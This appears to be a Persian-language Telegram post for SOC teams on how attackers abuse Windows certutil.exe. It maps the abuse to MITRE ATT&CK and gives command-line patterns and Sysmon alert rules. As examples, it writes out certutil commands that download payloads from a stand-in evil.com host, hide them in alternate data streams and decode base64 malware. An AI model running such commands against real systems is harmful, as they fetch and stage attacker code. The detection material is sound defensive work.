🛡️ تحلیل تخصصی: Certutil.exe مرتبط با پست بالا ☝️☝️☝️☝️ ابزاری که مهاجمان با آن می تونند SOC را به راحتی دور بزنند ━━━━━━━━━━━━━━━━━━━━━ ۱. بردار حمله ━━━━━━━━━━━━━━━━━━━━━ میخوام یه چیزی رو برتون روشن کنم که خیلی از تیمهای SOC ازش غافلاند: Certutil.exe یه ابزار کاملاً قانونی مایکروسافته که روی هر ویندوزی هست برای مدیریت گواهی دیجیتال طراحی شده. ولی مهاجمان سالهاست دارن ازش سوءاستفاده میکنن چون سه تا ویژگی طلایی داره: ▸ امضای دیجیتال مایکروسافت داره —AV و EDR بهش کاملاً اعتماد میکنن ▸ روی تمام نسخههای ویندوز از پیش نصبه — نیاز به هیچ ابزار اضافهای نیست ▸ میتونه مستقیم از اینترنت فایل دانلود کنه — بدون PowerShell، بدون curl وقتی یه مهاجم به شبکه نفوذ کرده، بهجای اینکه یه ابزار مشکوک آپلود کنه و ریسک شناسایی رو بپذیره، از همین certutil استفاده میکنه. من چند تا Command رو میذارم که باید حتماً روی سیستمهاتون دنبالشون بگردید: ▸ دانلود مستقیم Payload: certutil.exe -urlcache -f https://evil.com/shell.exe %TEMP%\shell.exe ▸ رمزگشایی فایل مخرب Base64: certutil.exe -decode encoded.txt malware.exe ▸ مخفی کردن Payload در Alternate Data Stream: certutil.exe -urlcache -f https://evil.com/a.ps1 C:\legit.txt:hidden.ps1 ▸ دور زدن Application Allowlisting: certutil.exe -verifyctl -f https://evil.com/payload.exe یه آمار مهم : طبق گزارش CrowdStrike 2025، در ۷۹٪ از حملات سال ۲۰۲۴ هیچ بدافزار سنتی استفاده نشده. LOLBins الان در ۱۷٪ از تمام تحقیقات امنیتی Q3-2025 دیده میشه — این عدد فقط در یه سال از ۱۳٪ رشد کرده. این یعنی تهدید داره بزرگتر میشه، نه کوچکتر. ━━━━━━━━━━━━━━━━━━━━━ ۲. نگاشت MITRE ATT&CK ━━━━━━━━━━━━━━━━━━━━━ وقتی این تکنیک رو روی MITRE ATT&CK Map میکنم، به این Technique هامیرسم: ▸ T1105 — Ingress Tool Transfer دانلود مستقیم Payload با -urlcache -f ▸ T1140 — Deobfuscate/Decode Files رمزگشایی فایلهای Base64 با -decode ▸ T1027.013 — Encrypted/Encoded File مهاجم Payload رو قبل از دانلود رمز میکنه تا از بازرسی محتوا فرار کنه ▸ T1564.004 — Hide Artifacts: NTFS File Attributes ذخیره Payload در Alternate Data Stream — جایی که اکثر ابزارها نمیبیننش ▸ T1218 — System Binary Proxy Execution اجرای کد مخرب از طریق یه باینری که مایکروسافت امضاش کرده این تکنیک رو گروههای APT زیرتا حالا استفاده کردن: • APT28 (Fancy Bear روسیه) • Billbug چین (هدف: سازمانهای دولتی آسیا) • FIN7 • باجافزار Black Basta ━━━━━━━━━━━━━━━━━━━━ ۳. شاخصهای آلودگی (IoCs) ━━━━━━━━━━━━━━━━━━━━━ یه نکته خیلی مهم اینجا هست که باید بدونید: Certutil هیچ Hash ثابتی برای شناسایی نداره — چون خود باینری ویندوزه. پس شناسایی باید کاملاً رفتاری باشه، نه مبتنی بر Hash. Command Line هایی که باید در لاگهاتون دنبالشون بگردید: certutil.exe -urlcache -f http* certutil.exe -urlcache -f https* certutil.exe -decode * certutil.exe -verifyctl -f http* certutil.exe * -split * مسیرهای خروجی مشکوک: %TEMP%\*.exe %APPDATA%\*.exe C:\Users\*\Downloads\*.exe هر مسیری که شامل کاراکتر : باشه (Alternate Data Stream) یه چیز که من همیشه روش تأکید میکنم: فرآیند والد (Parent Process) رو نگاه کنید. اگر certutil.exe از این فرآیندها فراخوانی شده باشه، باید فوراً Alert بده: • outlook.exe • winword.exe / excel.exe • iexplore.exe / msedge.exe • mshta.exe ━━━━━━━━━━━━━━━━━━━━━ ۴. چرا SOC معمولی این رو از دست میده ━━━━━━━━━━━━━━━━━━━━━ مشکل اصلی اینه که certutil.exe یه ابزار کاملاً مشروعه. اگه تیم SOC فقط روی Hash فایل یا Signature بدافزار تکیه کنه، این حمله رو اصلاً نمیبینه. تنها راه تشخیص، تحلیل رفتاری (Behavioral Analysis) هست. Event هایی که باید حتماً Monitor کنید: 🔍 Sysmon Event ID 1 (Process Create) فیلد: CommandLine شرط Alert: certutil.exe همراه با (-urlcache، -decode، -verifyctl) مهمتر: اگه ParentImage یکی از {outlook.exe, winword.exe, excel.exe, mshta.exe} بود → Alert فوری حتی بدون آرگومان مشکوک 🔍 Sysmon Event ID 3 (Network Connection) شرط Alert: Image = certutil.exe AND DestinationPort ∈ {80, 443, 8080} → هر اتصال شبکه از certutil باید Alert بشه. نقطه. 🔍 Sysmon Event ID 11 (File Create) شرط Alert: Image = certutil.exe AND فایل خروجی با پسوند (.exe، .dll، .ps1، .bat، .vbs) 🔍 Sysmon Event ID 15 (FileCreateStreamHash) شرط Alert: هر Alternate Data Stream که certutil ساخته
cyber news & reference books: post #1223 — TG.ME
July 25, 2026 71 3